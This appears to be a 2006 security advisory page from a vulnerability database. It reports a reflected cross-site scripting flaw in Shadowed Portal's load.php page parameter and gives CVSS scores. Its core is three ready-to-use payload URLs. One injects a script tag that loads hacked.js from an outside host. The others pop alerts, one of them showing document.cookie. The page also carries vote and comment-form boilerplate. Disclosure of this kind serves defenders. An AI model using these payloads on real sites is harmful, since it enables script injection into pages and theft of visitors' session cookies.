Shadowed Portal Cross Site Scripting

2006.04.10
Credit: Liz0ziM
Risk: Low
Local: Yes
Remote: Yes
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------------------------ ------------- Shadowed Portal Cross Site Scripting Site:http://www.shad0wed.com/ Demo:http://www.shad0wed.com/ --------------------------------------------------- Credit : Liz0ziM webpage:www.biyo.tk www.biyosecurity.be Mail :liz0 (at) bsdmail (dot) com [email concealed] ------------------------------------------------------------------------ ------------- Shadowed Portal http://victim/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script> http://victim/path/load.php?mod=pages&page="><script>alert(/BiyoSecurity Team/)</script> http://victim/path/load.php?mod=pages&page="><script>alert(document.cook ie)</script> ------------------------------------------------------------------------ ---------------- Source: http://www.blogcu.com/Liz0ziM/350164/ http://liz0zim.no-ip.org/shad0w.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top